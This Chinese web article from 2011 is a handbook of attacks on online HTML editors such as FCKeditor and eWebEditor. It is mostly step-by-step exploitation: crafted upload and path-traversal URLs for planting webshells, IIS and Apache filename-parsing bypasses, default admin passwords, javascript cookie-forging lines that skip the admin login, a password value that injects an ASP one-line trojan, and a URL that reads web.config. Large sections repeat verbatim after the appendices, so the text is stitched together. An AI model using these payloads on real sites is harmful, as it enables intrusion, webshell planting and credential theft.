常用網(wǎng)頁(yè)編輯器漏洞手冊(cè)(全面版)fckeditor,ewebeditor
更新時(shí)間:2011年04月15日 00:58:37 作者:
常用網(wǎng)頁(yè)編輯器漏洞手冊(cè)(全面版)fckeditor,ewebeditor,使用這類編輯器的朋友一定要注意下。
FCKeditor
FCKeditor編輯器頁(yè)/查看編輯器版本/查看文件上傳路徑
FCKeditor編輯器頁(yè)
FCKeditor/_samples/default.html
查看編輯器版本
FCKeditor/_whatsnew.html
查看文件上傳路徑
fckeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/
XML頁(yè)面中第二行 “url=/xxx”的部分就是默認(rèn)基準(zhǔn)上傳路徑
Note:[Hell1]截至2010年02月15日最新版本為FCKeditor v2.6.6
[Hell2]記得修改其中兩處asp為FCKeditor實(shí)際使用的腳本語(yǔ)言
FCKeditor被動(dòng)限制策略所導(dǎo)致的過(guò)濾不嚴(yán)問(wèn)題
影響版本: FCKeditor x.x <= FCKeditor v2.4.3
脆弱描述:
FCKeditor v2.4.3中File類別默認(rèn)拒絕上傳類型:html|htm|php|php2|php3|php4|php5|phtml|pwml|inc|asp|aspx|ascx|jsp|cfm|cfc|
pl|bat|exe|com|dll|vbs|js|reg|cgi|htaccess|asis|sh|shtml|shtm|phtm
Fckeditor 2.0 <= 2.2允許上傳asa、cer、php2、php4、inc、pwml、pht后綴的文件
上傳后 它保存的文件直接用的$sFilePath = $sServerDir . $sFileName,而沒(méi)有使用$sExtension為后綴
直接導(dǎo)致在win下在上傳文件后面加個(gè).來(lái)突破[未測(cè)試]
而在apache下,因?yàn)?Apache文件名解析缺陷漏洞"也可以利用之,詳見(jiàn)"附錄A"
另建議其他上傳漏洞中定義TYPE變量時(shí)使用File類別來(lái)上傳文件,根據(jù)FCKeditor的代碼,其限制最為狹隘。
攻擊利用:
允許其他任何后綴上傳
利用2003路徑解析漏洞上傳網(wǎng)馬
影響版本: 附錄B
脆弱描述:
利用2003系統(tǒng)路徑解析漏洞的原理,創(chuàng)建類似“bin.asp”如此一般的目錄,再在此目錄中上傳文件即可被腳本解釋器以相應(yīng)腳本權(quán)限執(zhí)行。
攻擊利用:
fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/asp/connector.asp
FCKeditor PHP上傳任意文件漏洞
影響版本: FCKeditor 2.2 <= FCKeditor 2.4.2
脆弱描述:
FCKeditor在處理文件上傳時(shí)存在輸入驗(yàn)證錯(cuò)誤,遠(yuǎn)程攻擊可以利用此漏洞上傳任意文件。
在通過(guò)editor/filemanager/upload/php/upload.php上傳文件時(shí)攻擊者可以通過(guò)為Type參數(shù)定義無(wú)效的值導(dǎo)致上傳任意腳本。
成功攻擊要求config.php配置文件中啟用文件上傳,而默認(rèn)是禁用的。攻擊利用: (請(qǐng)修改action字段為指定網(wǎng)址):
FCKeditor 《=2.4.2 for php.html
Note:如想嘗試v2.2版漏洞,則修改Type=任意值 即可,但注意,如果換回使用Media則必須大寫首字母M,否則LINUX下,F(xiàn)CKeditor會(huì)對(duì)文件目錄進(jìn)行文件名校驗(yàn),不會(huì)上傳成功的。
TYPE自定義變量任意上傳文件漏洞
影響版本: 較早版本
脆弱描述:
通過(guò)自定義Type變量的參數(shù),可以創(chuàng)建或上傳文件到指定的目錄中去,且沒(méi)有上傳文件格式的限制。
攻擊利用: /FCKeditor/editor/filemanager/browser/default/browser.html?Type=all&Connector=connectors/asp/connector.asp
打開(kāi)這個(gè)地址就可以上傳任何類型的文件了,Shell上傳到的默認(rèn)位置是:
http://www.heimian.com/UserFiles/all/1.asp
"Type=all" 這個(gè)變量是自定義的,在這里創(chuàng)建了all這個(gè)目錄,而且新的目錄沒(méi)有上傳文件格式的限制.
比如輸入:
/FCKeditor/editor/filemanager/browser/default/browser.html?Type=../&Connector=connectors/asp/connector.asp
網(wǎng)馬就可以傳到網(wǎng)站的根目錄下.
Note:如找不到默認(rèn)上傳文件夾可檢查此文件: fckeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/
FCKeditor 新聞組件遍歷目錄漏洞
影響版本:aspx版FCKeditor,其余版本未測(cè)試
脆弱描述:如何獲得webshell請(qǐng)參考上文“TYPE自定義變量任意上傳文件漏洞”
攻擊利用:
修改CurrentFolder參數(shù)使用 ../../來(lái)進(jìn)入不同的目錄
/browser/default/connectors/aspx/connector.aspx?Command=CreateFolder&Type=Image&CurrentFolder=../../..%2F&NewFolderName=aspx.asp
根據(jù)返回的XML信息可以查看網(wǎng)站所有的目錄。
/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=%2F
FCKeditor中webshell的其他上傳方式
影響版本:非優(yōu)化/精簡(jiǎn)版本的FCKeditor
脆弱描述:
如果存在以下文件,打開(kāi)后即可上傳文件。
攻擊利用:
fckeditor/editor/filemanager/upload/test.html
fckeditor/editor/filemanager/browser/default/connectors/test.html
FCKeditor 文件上傳“.”變“_”下劃線的繞過(guò)方法
影響版本: FCKeditor => 2.4.x
脆弱描述:
我們上傳的文件例如:shell.php.rar或shell.php;.jpg會(huì)變?yōu)閟hell_php;.jpg這是新版FCK的變化。
攻擊利用:
提交1.php+空格 就可以繞過(guò)去所有的,
※不過(guò)空格只支持win系統(tǒng) *nix是不支持的[1.php和1.php+空格是2個(gè)不同的文件]
Note:upload/2010/3/201003102334372778.jpg 這樣的格式做了過(guò)濾。也就是IIS6解析漏洞。
上傳第一次。被過(guò)濾為123_asp;123.jpg 從而無(wú)法運(yùn)行。
但是第2次上傳同名文件123.asp;123.jpg后。由于”123_asp;123.jpg”已經(jīng)存在。
文件名被命名為123.asp;123(1).jpg …… 123.asp;123(2).jpg這樣的編號(hào)方式。
所以。IIS6的漏洞繼續(xù)執(zhí)行了。
如果通過(guò)上面的步驟進(jìn)行測(cè)試沒(méi)有成功,可能有以下幾方面的原因:
1.FCKeditor沒(méi)有開(kāi)啟文件上傳功能,這項(xiàng)功能在安裝FCKeditor時(shí)默認(rèn)是關(guān)閉的。如果想上傳文件,F(xiàn)CKeditor會(huì)給出錯(cuò)誤提示。
2.網(wǎng)站采用了精簡(jiǎn)版的FCKeditor,精簡(jiǎn)版的FCKeditor很多功能丟失,包括文件上傳功能。
3.FCKeditor的這個(gè)漏洞已經(jīng)被修復(fù)。
--------------------------------------------------------------------------------
eWebEditor
eWebEditor利用基礎(chǔ)知識(shí)
默認(rèn)后臺(tái)地址:/ewebeditor/admin_login.asp
建議最好檢測(cè)下admin_style.asp文件是否可以直接訪問(wèn)
默認(rèn)數(shù)據(jù)庫(kù)路徑:[PATH]/db/ewebeditor.mdb
[PATH]/db/db.mdb -- 某些CMS里是這個(gè)數(shù)據(jù)庫(kù)
也可嘗試 [PATH]/db/%23ewebeditor.mdb -- 某些管理員自作聰明的小伎倆
使用默認(rèn)密碼:admin/admin888 或 admin/admin 進(jìn)入后臺(tái),也可嘗試 admin/123456 (有些管理員以及一些CMS,就是這么設(shè)置的)
點(diǎn)擊“樣式管理”--可以選擇新增樣式,或者修改一個(gè)非系統(tǒng)樣式,將其中圖片控件所允許的上傳類型后面加上|asp、|asa、|aaspsp或|cer,只要是服務(wù)器允許執(zhí)行的腳本類型即可,點(diǎn)擊“提交”并設(shè)置工具欄--將“插入圖片”控件添加上。而后--預(yù)覽此樣式,點(diǎn)擊插入圖片,上傳WEBSHELL,在“代碼”模式中查看上傳文件的路徑。
2、當(dāng)數(shù)據(jù)庫(kù)被管理員修改為asp、asa后綴的時(shí)候,可以插一句話木馬服務(wù)端進(jìn)入數(shù)據(jù)庫(kù),然后一句話木馬客戶端連接拿下webshell
3、上傳后無(wú)法執(zhí)行?目錄沒(méi)權(quán)限?帥鍋你回去樣式管理看你編輯過(guò)的那個(gè)樣式,里面可以自定義上傳路徑的!!!
4、設(shè)置好了上傳類型,依然上傳不了麼?估計(jì)是文件代碼被改了,可以嘗試設(shè)定“遠(yuǎn)程類型”依照6.0版本拿SHELL的方法來(lái)做(詳情見(jiàn)下文↓),能夠設(shè)定自動(dòng)保存遠(yuǎn)程文件的類型。
5、不能添加工具欄,但設(shè)定好了某樣式中的文件類型,怎么辦?↓這么辦!
(請(qǐng)修改action字段)
Action.html
eWebEditor踩腳印式入侵
脆弱描述:
當(dāng)我們下載數(shù)據(jù)庫(kù)后查詢不到密碼MD5的明文時(shí),可以去看看webeditor_style(14)這個(gè)樣式表,看看是否有前輩入侵過(guò) 或許已經(jīng)賦予了某控件上傳腳本的能力,構(gòu)造地址來(lái)上傳我們自己的WEBSHELL.
攻擊利用:
比如 ID=46 s-name =standard1
構(gòu)造 代碼: ewebeditor.asp?id=content&style=standard
ID和和樣式名改過(guò)后
ewebeditor.asp?id=46&style=standard1
eWebEditor遍歷目錄漏洞
脆弱描述:
ewebeditor/admin_uploadfile.asp
admin/upload.asp
過(guò)濾不嚴(yán),造成遍歷目錄漏洞
攻擊利用:
第一種:ewebeditor/admin_uploadfile.asp?id=14
在id=14后面添加&dir=..
再加 &dir=../..
&dir=http://www.heimian.com/../.. 看到整個(gè)網(wǎng)站文件了
第二種: ewebeditor/admin/upload.asp?id=16&d_viewmode=&dir =./..
eWebEditor 5.2 列目錄漏洞
脆弱描述:
ewebeditor/asp/browse.asp
過(guò)濾不嚴(yán),造成遍歷目錄漏洞
攻擊利用:
http://www.dbjr.com.cn/ewebeditor/asp/browse.asp?style=standard650&dir=…././/..
利用WebEditor session欺騙漏洞,進(jìn)入后臺(tái)
脆弱描述:
漏洞文件:Admin_Private.asp
只判斷了session,沒(méi)有判斷cookies和路徑的驗(yàn)證問(wèn)題。
攻擊利用:
新建一個(gè)test.asp內(nèi)容如下:
訪問(wèn)test.asp,再訪問(wèn)后臺(tái)任何文件,for example:Admin_Default.asp
eWebEditor asp版 2.1.6 上傳漏洞
攻擊利用:(請(qǐng)修改action字段為指定網(wǎng)址)
ewebeditor asp版2.1.6上傳漏洞利用程序.html
eWebEditor 2.7.0 注入漏洞
攻擊利用:
http://www.dbjr.com.cn/ewebeditor/ewebeditor.asp?id=article_content&style=full_v200
默認(rèn)表名:eWebEditor_System默認(rèn)列名:sys_UserName、sys_UserPass,然后利用nbsi進(jìn)行猜解.
eWebEditor2.8.0最終版刪除任意文件漏洞
脆弱描述:
此漏洞存在于Example\NewsSystem目錄下的delete.asp文件中,這是ewebeditor的測(cè)試頁(yè)面,無(wú)須登陸可以直接進(jìn)入。
攻擊利用: (請(qǐng)修改action字段為指定網(wǎng)址)
Del Files.html
eWebEditor v6.0.0 上傳漏洞
攻擊利用:
在編輯器中點(diǎn)擊“插入圖片”--網(wǎng)絡(luò)--輸入你的WEBSHELL在某空間上的地址(注:文件名稱必須為:xxx.jpg.asp 以此類推…),確定后,點(diǎn)擊“遠(yuǎn)程文件自動(dòng)上傳”控件(第一次上傳會(huì)提示你安裝控件,稍等即可),查看“代碼”模式找到文件上傳路徑,訪問(wèn)即可,eweb官方的DEMO也可以這么做,不過(guò)對(duì)上傳目錄取消掉了執(zhí)行權(quán)限,所以上傳上去也無(wú)法執(zhí)行網(wǎng)馬.
eWebEditor PHP/ASP…后臺(tái)通殺漏洞
影響版本: PHP ≥ 3.0~3.8與asp 2.8版也通用,或許低版本也可以,有待測(cè)試。
攻擊利用:
進(jìn)入后臺(tái)/eWebEditor/admin/login.php,隨便輸入一個(gè)用戶和密碼,會(huì)提示出錯(cuò)了.
這時(shí)候你清空瀏覽器的url,然后輸入
javascript:alert(document.cookie="adminuser="+escape("admin"));
javascript:alert(document.cookie="adminpass="+escape("admin"));
javascript:alert(document.cookie="admindj="+escape("1"));
而后三次回車,清空瀏覽器的URL,現(xiàn)在輸入一些平常訪問(wèn)不到的文件如../ewebeditor/admin/default.php,就會(huì)直接進(jìn)去。
eWebEditor for php任意文件上傳漏洞
影響版本:ewebeditor php v3.8 or older version
脆弱描述:
此版本將所有的風(fēng)格配置信息保存為一個(gè)數(shù)組$aStyle,在php.ini配置register_global為on的情況下我們可以任意添加自己喜歡的風(fēng)格,并定義上傳類型。
攻擊利用:
phpupload.html
eWebEditor JSP版漏洞
大同小異,我在本文檔不想多說(shuō)了,因?yàn)闆](méi)環(huán)境 測(cè)試,網(wǎng)上垃圾場(chǎng)那么大,不好排查。用JSP編輯器的我覺(jué)得eweb會(huì)比FCKeditor份額少得多。
eWebEditor 2.8 商業(yè)版插一句話木馬
影響版本:=>2.8 商業(yè)版
攻擊利用:
登陸后臺(tái),點(diǎn)擊修改密碼---新密碼設(shè)置為 1":eval request("h")'
設(shè)置成功后,訪問(wèn)asp/config.asp文件即可,一句話木馬被寫入到這個(gè)文件里面了.
eWebEditorNet upload.aspx 上傳漏洞(WebEditorNet)
脆弱描述:
WebEditorNet 主要是一個(gè)upload.aspx文件存在上傳漏洞。
攻擊利用:
默認(rèn)上傳地址:/ewebeditornet/upload.aspx
可以直接上傳一個(gè)cer的木馬
如果不能上傳則在瀏覽器地址欄中輸入javascript:lbtnUpload.click();
成功以后查看源代碼找到uploadsave查看上傳保存地址,默認(rèn)傳到uploadfile這個(gè)文件夾里。
southidceditor(一般使用v2.8.0版eWeb核心)
idceditor/datas/southidceditor.mdb">http://www.heimian.com/admin/southidceditor/datas/southidceditor.mdb
http://www.safe5com/admin/southidceditor/admin/admin_login.asp
http://www.dbjr.com.cn/admin/southidceditor/popup.asp
bigcneditor(eWeb 2.7.5 VIP核心)
其實(shí)所謂的Bigcneditor就是eWebEditor 2.7.5的VIP用戶版.之所以無(wú)法訪問(wèn)admin_login.asp,提示“權(quán)限不夠”4字真言,估計(jì)就是因?yàn)槠涫跈?quán)“Licensed”問(wèn)題,或許只允許被授權(quán)的機(jī)器訪問(wèn)后臺(tái)才對(duì)。
或許上面針對(duì)eWebEditor v2.8以下低版本的小動(dòng)作可以用到這上面來(lái).貌似沒(méi)多少動(dòng)作?
--------------------------------------------------------------------------------
Cute Editor
Cute Editor在線編輯器本地包含漏洞
影響版本:
CuteEditor For Net 6.4
脆弱描述:
可以隨意查看網(wǎng)站文件內(nèi)容,危害較大。
攻擊利用:
http://www.dbjr.com.cn/CuteSoft_Client/CuteEditor/Load.ashx?type=image&file=../../../web.config
--------------------------------------------------------------------------------
Webhtmleditor
利用WIN 2003 IIS文件名稱解析漏洞獲得SHELL
影響版本:<= Webhtmleditor最終版1.7 (已停止更新)
脆弱描述/攻擊利用:
對(duì)上傳的圖片或其他文件無(wú)重命名操作,導(dǎo)致允許惡意用戶上傳diy.asp;.jpg來(lái)繞過(guò)對(duì)后綴名審查的限制,對(duì)于此類因編輯器作者意識(shí)犯下的錯(cuò)誤,就算遭遇縮略圖,文件頭檢測(cè),也可使用圖片木馬 插入一句話來(lái)突破。
--------------------------------------------------------------------------------
Kindeditor
利用WIN 2003 IIS文件名稱解析漏洞獲得SHELL
影響版本: <= kindeditor 3.2.1(09年8月份發(fā)布的最新版)
脆弱描述/攻擊利用:
拿官方做個(gè)演示:進(jìn)入upload/2010/3/201003102334381513.jpg 大家可以前去圍觀。
Note:參見(jiàn)附錄C原理解析。
--------------------------------------------------------------------------------
Freetextbox
Freetextbox遍歷目錄漏洞
影響版本:未知
脆弱描述:
因?yàn)閒tb.imagegallery.aspx代碼中 只過(guò)濾了/但是沒(méi)有過(guò)濾\符號(hào)所以導(dǎo)致出現(xiàn)了遍歷目錄的問(wèn)題。
攻擊利用:
在編輯器頁(yè)面點(diǎn)圖片會(huì)彈出一個(gè)框(抓包得到此地址)構(gòu)造如下,可遍歷目錄。
http://www.dbjr.com.cn/Member/images/ftb/HelperScripts/ftb.imagegallery.aspx?frame=1&rif=..&cif=\..
--------------------------------------------------------------------------------
附錄A:
Apache文件名解析缺陷漏洞:
測(cè)試環(huán)境:apache 2.0.53 winxp,apache 2.0.52 redhat linux
1.國(guó)外(SSR TEAM)發(fā)了多個(gè)advisory稱Apache's MIME module (mod_mime)相關(guān)漏洞,就是attack.php.rar會(huì)被當(dāng)做php文件執(zhí)行的漏洞,包括Discuz!那個(gè)p11.php.php.php.php.php.php.php.php.php.php.php.php.rar漏洞。
2.S4T的superhei在blog上發(fā)布了這個(gè)apache的小特性,即apache 是從后面開(kāi)始檢查后綴,按最后一個(gè)合法后綴執(zhí)行。其實(shí)只要看一下apache的htdocs那些默認(rèn)安裝的index.XX文件就明白了。
3.superhei已經(jīng)說(shuō)的非常清楚了,可以充分利用在上傳漏洞上,我按照普遍允許上傳的文件格式測(cè)試了一下,列舉如下(亂分類勿怪)
典型型:rar
備份型:bak,lock
流媒體型:wma,wmv,asx,as,mp4,rmvb
微軟型:sql,chm,hlp,shtml,asp
任意型:test,fake,ph4nt0m
特殊型:torrent
程序型:jsp,c,cpp,pl,cgi
4.整個(gè)漏洞的關(guān)鍵就是apache的"合法后綴"到底是哪些,不是"合法后綴"的都可以被利用。
5.測(cè)試環(huán)境
a.php
然后增加任意后綴測(cè)試,a.php.aaa,a.php.aab....
By cloie, in ph4nt0m.net(c) Security.
附錄B:
安裝了iis6的服務(wù)器(windows2003),受影響的文件名后綴有.asp .asa .cdx .cer .pl .php .cgi
Windows 2003 Enterprise Edition是微軟目前主流的服務(wù)器操作系統(tǒng)。 Windows 2003 IIS6 存在著文件解析路徑的漏洞,當(dāng)文件夾名為類似hack.asp的時(shí)候(即文件夾名看起來(lái)像一個(gè)ASP文件的文件名),此時(shí)此文件夾下的任何類型的文件(比如.gif,.jpg,.txt等)都可以在IIS中被當(dāng)做ASP程序來(lái)執(zhí)行。這樣黑客即可上傳擴(kuò)展名為jpg或gif之類的看起來(lái)像是圖片文件的木馬文件,通過(guò)訪問(wèn)這個(gè)文件即可運(yùn)行木馬。如果這些網(wǎng)站中有任何一個(gè)文件夾的名字是以 .asp .php .cer .asa .cgi .pl 等結(jié)尾,那么放在這些文件夾下面的任何類型的文件都有可能被認(rèn)為是腳本文件而交給腳本解析器而執(zhí)行。
附錄C:
漏洞描述:
當(dāng)文件名為[YYY].asp;[ZZZ].jpg時(shí),Microsoft IIS會(huì)自動(dòng)以asp格式來(lái)進(jìn)行解析。
而當(dāng)文件名為[YYY].php;[ZZZ].jpg時(shí),Microsoft IIS會(huì)自動(dòng)以php格式來(lái)進(jìn)行解析。
其中[YYY]與[ZZZ]處為可變化字符串。
影響平臺(tái):
Windows Server 2000 / 2003 / 2003 R2 (IIS 5.x / 6.0)
修補(bǔ)方法:
1、等待微軟相關(guān)的補(bǔ)丁包
2、關(guān)閉圖片所在目錄的腳本執(zhí)行權(quán)限(前提是你的某些圖片沒(méi)有與程序混合存放)
3、校驗(yàn)網(wǎng)站程序中所有上傳圖片的代碼段,對(duì)形如[YYY].asp;[ZZZ].jpg的圖片做攔截
備注:
對(duì)于Windows Server 2008(IIS7)以及Windows Server 2008 R2(IIS7.5) 則未受影響.
FCKeditor編輯器頁(yè)/查看編輯器版本/查看文件上傳路徑
FCKeditor編輯器頁(yè)
FCKeditor/_samples/default.html
查看編輯器版本
FCKeditor/_whatsnew.html
查看文件上傳路徑
fckeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/
XML頁(yè)面中第二行 “url=/xxx”的部分就是默認(rèn)基準(zhǔn)上傳路徑
Note:[Hell1]截至2010年02月15日最新版本為FCKeditor v2.6.6
[Hell2]記得修改其中兩處asp為FCKeditor實(shí)際使用的腳本語(yǔ)言
FCKeditor被動(dòng)限制策略所導(dǎo)致的過(guò)濾不嚴(yán)問(wèn)題
影響版本: FCKeditor x.x <= FCKeditor v2.4.3
脆弱描述:
FCKeditor v2.4.3中File類別默認(rèn)拒絕上傳類型:html|htm|php|php2|php3|php4|php5|phtml|pwml|inc|asp|aspx|ascx|jsp|cfm|cfc|
pl|bat|exe|com|dll|vbs|js|reg|cgi|htaccess|asis|sh|shtml|shtm|phtm
Fckeditor 2.0 <= 2.2允許上傳asa、cer、php2、php4、inc、pwml、pht后綴的文件
上傳后 它保存的文件直接用的$sFilePath = $sServerDir . $sFileName,而沒(méi)有使用$sExtension為后綴
直接導(dǎo)致在win下在上傳文件后面加個(gè).來(lái)突破[未測(cè)試]
而在apache下,因?yàn)?Apache文件名解析缺陷漏洞"也可以利用之,詳見(jiàn)"附錄A"
另建議其他上傳漏洞中定義TYPE變量時(shí)使用File類別來(lái)上傳文件,根據(jù)FCKeditor的代碼,其限制最為狹隘。
攻擊利用:
允許其他任何后綴上傳
利用2003路徑解析漏洞上傳網(wǎng)馬
影響版本: 附錄B
脆弱描述:
利用2003系統(tǒng)路徑解析漏洞的原理,創(chuàng)建類似“bin.asp”如此一般的目錄,再在此目錄中上傳文件即可被腳本解釋器以相應(yīng)腳本權(quán)限執(zhí)行。
攻擊利用:
fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/asp/connector.asp
FCKeditor PHP上傳任意文件漏洞
影響版本: FCKeditor 2.2 <= FCKeditor 2.4.2
脆弱描述:
FCKeditor在處理文件上傳時(shí)存在輸入驗(yàn)證錯(cuò)誤,遠(yuǎn)程攻擊可以利用此漏洞上傳任意文件。
在通過(guò)editor/filemanager/upload/php/upload.php上傳文件時(shí)攻擊者可以通過(guò)為Type參數(shù)定義無(wú)效的值導(dǎo)致上傳任意腳本。
成功攻擊要求config.php配置文件中啟用文件上傳,而默認(rèn)是禁用的。攻擊利用: (請(qǐng)修改action字段為指定網(wǎng)址):
FCKeditor 《=2.4.2 for php.html
Note:如想嘗試v2.2版漏洞,則修改Type=任意值 即可,但注意,如果換回使用Media則必須大寫首字母M,否則LINUX下,F(xiàn)CKeditor會(huì)對(duì)文件目錄進(jìn)行文件名校驗(yàn),不會(huì)上傳成功的。
TYPE自定義變量任意上傳文件漏洞
影響版本: 較早版本
脆弱描述:
通過(guò)自定義Type變量的參數(shù),可以創(chuàng)建或上傳文件到指定的目錄中去,且沒(méi)有上傳文件格式的限制。
攻擊利用: /FCKeditor/editor/filemanager/browser/default/browser.html?Type=all&Connector=connectors/asp/connector.asp
打開(kāi)這個(gè)地址就可以上傳任何類型的文件了,Shell上傳到的默認(rèn)位置是:
http://www.heimian.com/UserFiles/all/1.asp
"Type=all" 這個(gè)變量是自定義的,在這里創(chuàng)建了all這個(gè)目錄,而且新的目錄沒(méi)有上傳文件格式的限制.
比如輸入:
/FCKeditor/editor/filemanager/browser/default/browser.html?Type=../&Connector=connectors/asp/connector.asp
網(wǎng)馬就可以傳到網(wǎng)站的根目錄下.
Note:如找不到默認(rèn)上傳文件夾可檢查此文件: fckeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/
FCKeditor 新聞組件遍歷目錄漏洞
影響版本:aspx版FCKeditor,其余版本未測(cè)試
脆弱描述:如何獲得webshell請(qǐng)參考上文“TYPE自定義變量任意上傳文件漏洞”
攻擊利用:
修改CurrentFolder參數(shù)使用 ../../來(lái)進(jìn)入不同的目錄
/browser/default/connectors/aspx/connector.aspx?Command=CreateFolder&Type=Image&CurrentFolder=../../..%2F&NewFolderName=aspx.asp
根據(jù)返回的XML信息可以查看網(wǎng)站所有的目錄。
/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=%2F
FCKeditor中webshell的其他上傳方式
影響版本:非優(yōu)化/精簡(jiǎn)版本的FCKeditor
脆弱描述:
如果存在以下文件,打開(kāi)后即可上傳文件。
攻擊利用:
fckeditor/editor/filemanager/upload/test.html
fckeditor/editor/filemanager/browser/default/connectors/test.html
FCKeditor 文件上傳“.”變“_”下劃線的繞過(guò)方法
影響版本: FCKeditor => 2.4.x
脆弱描述:
我們上傳的文件例如:shell.php.rar或shell.php;.jpg會(huì)變?yōu)閟hell_php;.jpg這是新版FCK的變化。
攻擊利用:
提交1.php+空格 就可以繞過(guò)去所有的,
※不過(guò)空格只支持win系統(tǒng) *nix是不支持的[1.php和1.php+空格是2個(gè)不同的文件]
Note:upload/2010/3/201003102334372778.jpg 這樣的格式做了過(guò)濾。也就是IIS6解析漏洞。
上傳第一次。被過(guò)濾為123_asp;123.jpg 從而無(wú)法運(yùn)行。
但是第2次上傳同名文件123.asp;123.jpg后。由于”123_asp;123.jpg”已經(jīng)存在。
文件名被命名為123.asp;123(1).jpg …… 123.asp;123(2).jpg這樣的編號(hào)方式。
所以。IIS6的漏洞繼續(xù)執(zhí)行了。
如果通過(guò)上面的步驟進(jìn)行測(cè)試沒(méi)有成功,可能有以下幾方面的原因:
1.FCKeditor沒(méi)有開(kāi)啟文件上傳功能,這項(xiàng)功能在安裝FCKeditor時(shí)默認(rèn)是關(guān)閉的。如果想上傳文件,F(xiàn)CKeditor會(huì)給出錯(cuò)誤提示。
2.網(wǎng)站采用了精簡(jiǎn)版的FCKeditor,精簡(jiǎn)版的FCKeditor很多功能丟失,包括文件上傳功能。
3.FCKeditor的這個(gè)漏洞已經(jīng)被修復(fù)。
--------------------------------------------------------------------------------
eWebEditor
eWebEditor利用基礎(chǔ)知識(shí)
默認(rèn)后臺(tái)地址:/ewebeditor/admin_login.asp
建議最好檢測(cè)下admin_style.asp文件是否可以直接訪問(wèn)
默認(rèn)數(shù)據(jù)庫(kù)路徑:[PATH]/db/ewebeditor.mdb
[PATH]/db/db.mdb -- 某些CMS里是這個(gè)數(shù)據(jù)庫(kù)
也可嘗試 [PATH]/db/%23ewebeditor.mdb -- 某些管理員自作聰明的小伎倆
使用默認(rèn)密碼:admin/admin888 或 admin/admin 進(jìn)入后臺(tái),也可嘗試 admin/123456 (有些管理員以及一些CMS,就是這么設(shè)置的)
點(diǎn)擊“樣式管理”--可以選擇新增樣式,或者修改一個(gè)非系統(tǒng)樣式,將其中圖片控件所允許的上傳類型后面加上|asp、|asa、|aaspsp或|cer,只要是服務(wù)器允許執(zhí)行的腳本類型即可,點(diǎn)擊“提交”并設(shè)置工具欄--將“插入圖片”控件添加上。而后--預(yù)覽此樣式,點(diǎn)擊插入圖片,上傳WEBSHELL,在“代碼”模式中查看上傳文件的路徑。
2、當(dāng)數(shù)據(jù)庫(kù)被管理員修改為asp、asa后綴的時(shí)候,可以插一句話木馬服務(wù)端進(jìn)入數(shù)據(jù)庫(kù),然后一句話木馬客戶端連接拿下webshell
3、上傳后無(wú)法執(zhí)行?目錄沒(méi)權(quán)限?帥鍋你回去樣式管理看你編輯過(guò)的那個(gè)樣式,里面可以自定義上傳路徑的!!!
4、設(shè)置好了上傳類型,依然上傳不了麼?估計(jì)是文件代碼被改了,可以嘗試設(shè)定“遠(yuǎn)程類型”依照6.0版本拿SHELL的方法來(lái)做(詳情見(jiàn)下文↓),能夠設(shè)定自動(dòng)保存遠(yuǎn)程文件的類型。
5、不能添加工具欄,但設(shè)定好了某樣式中的文件類型,怎么辦?↓這么辦!
(請(qǐng)修改action字段)
Action.html
eWebEditor踩腳印式入侵
脆弱描述:
當(dāng)我們下載數(shù)據(jù)庫(kù)后查詢不到密碼MD5的明文時(shí),可以去看看webeditor_style(14)這個(gè)樣式表,看看是否有前輩入侵過(guò) 或許已經(jīng)賦予了某控件上傳腳本的能力,構(gòu)造地址來(lái)上傳我們自己的WEBSHELL.
攻擊利用:
比如 ID=46 s-name =standard1
構(gòu)造 代碼: ewebeditor.asp?id=content&style=standard
ID和和樣式名改過(guò)后
ewebeditor.asp?id=46&style=standard1
eWebEditor遍歷目錄漏洞
脆弱描述:
ewebeditor/admin_uploadfile.asp
admin/upload.asp
過(guò)濾不嚴(yán),造成遍歷目錄漏洞
攻擊利用:
第一種:ewebeditor/admin_uploadfile.asp?id=14
在id=14后面添加&dir=..
再加 &dir=../..
&dir=http://www.heimian.com/../.. 看到整個(gè)網(wǎng)站文件了
第二種: ewebeditor/admin/upload.asp?id=16&d_viewmode=&dir =./..
eWebEditor 5.2 列目錄漏洞
脆弱描述:
ewebeditor/asp/browse.asp
過(guò)濾不嚴(yán),造成遍歷目錄漏洞
攻擊利用:
http://www.dbjr.com.cn/ewebeditor/asp/browse.asp?style=standard650&dir=…././/..
利用WebEditor session欺騙漏洞,進(jìn)入后臺(tái)
脆弱描述:
漏洞文件:Admin_Private.asp
只判斷了session,沒(méi)有判斷cookies和路徑的驗(yàn)證問(wèn)題。
攻擊利用:
新建一個(gè)test.asp內(nèi)容如下:
訪問(wèn)test.asp,再訪問(wèn)后臺(tái)任何文件,for example:Admin_Default.asp
eWebEditor asp版 2.1.6 上傳漏洞
攻擊利用:(請(qǐng)修改action字段為指定網(wǎng)址)
ewebeditor asp版2.1.6上傳漏洞利用程序.html
eWebEditor 2.7.0 注入漏洞
攻擊利用:
http://www.dbjr.com.cn/ewebeditor/ewebeditor.asp?id=article_content&style=full_v200
默認(rèn)表名:eWebEditor_System默認(rèn)列名:sys_UserName、sys_UserPass,然后利用nbsi進(jìn)行猜解.
eWebEditor2.8.0最終版刪除任意文件漏洞
脆弱描述:
此漏洞存在于Example\NewsSystem目錄下的delete.asp文件中,這是ewebeditor的測(cè)試頁(yè)面,無(wú)須登陸可以直接進(jìn)入。
攻擊利用: (請(qǐng)修改action字段為指定網(wǎng)址)
Del Files.html
eWebEditor v6.0.0 上傳漏洞
攻擊利用:
在編輯器中點(diǎn)擊“插入圖片”--網(wǎng)絡(luò)--輸入你的WEBSHELL在某空間上的地址(注:文件名稱必須為:xxx.jpg.asp 以此類推…),確定后,點(diǎn)擊“遠(yuǎn)程文件自動(dòng)上傳”控件(第一次上傳會(huì)提示你安裝控件,稍等即可),查看“代碼”模式找到文件上傳路徑,訪問(wèn)即可,eweb官方的DEMO也可以這么做,不過(guò)對(duì)上傳目錄取消掉了執(zhí)行權(quán)限,所以上傳上去也無(wú)法執(zhí)行網(wǎng)馬.
